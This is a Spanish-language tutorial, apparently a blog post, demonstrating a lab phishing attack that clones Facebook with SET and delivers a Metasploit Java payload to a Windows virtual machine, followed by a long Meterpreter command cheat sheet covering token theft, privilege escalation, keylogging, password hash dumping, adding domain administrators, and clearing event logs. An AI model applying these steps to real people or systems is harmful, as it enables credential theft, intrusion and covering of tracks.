PHISHING CON SETOOLKIT
Aquí se realizará una demostración acerca de un ataque de phishing con la distribución de Kali desde una máquina virtual a un ordenador con Windows. Se efectuará el ataque realizando la clonación de la página web de Facebook, utilizando las herramientas SET y Metasploit para cargar un Java Applet en un ordenador con Windows.
¿Sabes que es el phishing? Es uno de los métodos más utilizados por ciberdelicuentes para estafar y obtener información confidencial como puede ser tu contraseña o información detallada sobre tus tarjetas de crédito. El estafador o phisher se hace pasar por una institución o empresa de tu confianza para así obtener tus datos e información para extorsionarte o hacer mal uso de ella
INDICE
Requisitos previos
Ingreso y actualización a setoolkit
Phishing. Clonación de Facebook con set y Metasploit
Configuración del meterpreter
Verificando conexiones y realizando pruebas de penetración
Comandos de meterpreter
Webgrafía
1- Requisitos previos
Para la realización de esta actividad necesitamos como requisitos previos los siguientes equipamientos mínimos:
Computadora Kali Linux Num. Procesadores: 2 Memoria: 2GB Disco: 20 GB Red: conexión tipo bridge (ip. estática)
Computadora Windows 10 (Máquina virtual) Num. Procesadores: 2 Memoria: 2GB Disco: 20 GB Red: conexión tipo bridge
2- Ingreso y actualización a setoolkit
Para ingresar al setoolkit colocamos en Kali desde la terminal la siguiente orden:
# sudo setoolkit.
Dentro de la misma ingresamos la opción 4 si queremos actualizar a la última versión.
3- Phishing. Clonación de Facebook con set y Metasploit
Para realizar el ataque de Ingeniería social escogemos la opción 1 del menú.
4- Configuración del meterpreter
En este punto lo que vamos hacer es generar el payload (código arbitrario) para inyectar en la máquina víctima. Lo hacemos de la siguiente manera:
5- Verificando conexiones y realizando pruebas de penetración
Luego de haber configurado el meterpreter automáticamente ingresamos a la consola de metasploit y podemos verificar las sesiones y ejecutar diferentes comandos.
6.- Comandos de meterpreter
help: Abrir uso ayuda Meterpreter
run scriptname: Ejecutar Meterpreter-basado en scripts, para obtener una lista completa de scripts/meterpreter en el directorio.
sysinfo: Mostrar la información del sistema en el destino remoto.
ls: Lista de archivos y carpetas en el objetivo.
use priv: Cargue el privilegio de la extensión para extender la librería el Meterpreter.
ps: Mostrar todos los procesos en ejecución y que las cuentas estén asociadas con cada proceso.
migrate PID: Migrar específicamente el proceso de ID (PID es el objetivo del proceso ID ganadodesde el comandos PS)
use incognito: Cargar funciones incógnitas. (Se utiliza para robar fichas y suplantación de una máquina de destino)
list_tokens -u: Lista fichas disponibles en el objetivo por el usuario.
list_tokens -g: Lista fichas disponibles en el objetivo por el grupo.
impersonate_token DOMAIN_NAME\\USERNAME: Hacerse pasar por una ficha disponible en el objetivo.
steal_token PID: Robar las fichas disponibles para un determinado proceso y hacerse pasar por esa señal.
drop_token: Deje de hacerse pasar por el token actual.
getsystem: Intento de elevar los permisos de acceso a nivel de sistema a través de múltiples vectores de ataque.
shell: Caer en un shell interactivo con todas las fichas disponibles.
execute -f cmd.ex -i – Ejecutar cmd.exe interactuar con él.
execute -f cmd.ex -i -t – Ejecutar cmd.exe con todas las fichas disponibles.
execute -f cmd.ex -i -H -t – Ejecutar cmd.exe con todas las fichas disponibles y convertirlo en un proceso oculto.
rev2self: Volver al usuario original que utilizó para poner en peligro el objetivo.
reg command: Interactuar, crear, eliminar, consultar, set, y mucho más en el registro del destino.
setdesktop number: Cambiar a una pantalla diferente en función de quién está conectado.
screenshot: Tome una captura de pantalla de la pantalla del destino.
upload file: Subir un archivo a la objetivo.
download file: Descargar los archivos desde el objetivo.
keyscan_start: detecte las pulsaciones de teclado en el destino remoto.
keyscan_dump: Volcar las teclas remotas capturados en el objetivo.
keyscan_stop: Deje de detectar las pulsaciones de teclado en el destino remoto.
getprivs: Obtener tantos privilegios como sea posible en el objetivo.
uictl enable keyboard/mouse: Toma el control del teclado y/o ratón.
backround: Ejecute su shell actual Meterpreter en el fondo.
hashdump: Volcar todos los hashes enel objetivo.
use sniffer: Cargue el módulo sniffer.
sniffer_interfaces: Lista de interfaces disponibles al objetivo.
sniffer_dump interfaceID pcapname: Comience sniffer en el destino remoto.
sniffer_start interfaceID packet-buffer: Comience sniffer con una gama específica para un buffer de paquetes.
sniffer_stats interfaceID: Coge la información de estadística de la interfaz que está en sniffer.
sniffer_stop interfaceID: Detenga el sniffer D:
add_user username password -h ip: Agregar un usuario en el destino remoto.
add_group_user “Domain Admins” username -h ip: Añadir un nombre de usuario al grupo Administradores de dominio en el destino remoto.
clearev: Borrar el registro de eventos en el equipo de destino.
timestomp: Cambiar atributos de archivo, como fecha de creación (antiforensics medida)
reboot: Reinicie el equipo de destino.
7.- Webgrafía
https://www.youtube.com/watch?v=IZTSZ0z8l-k https://creadpag.wordpress.com/2015/12/19/comandos-de-meterpreter/
Comments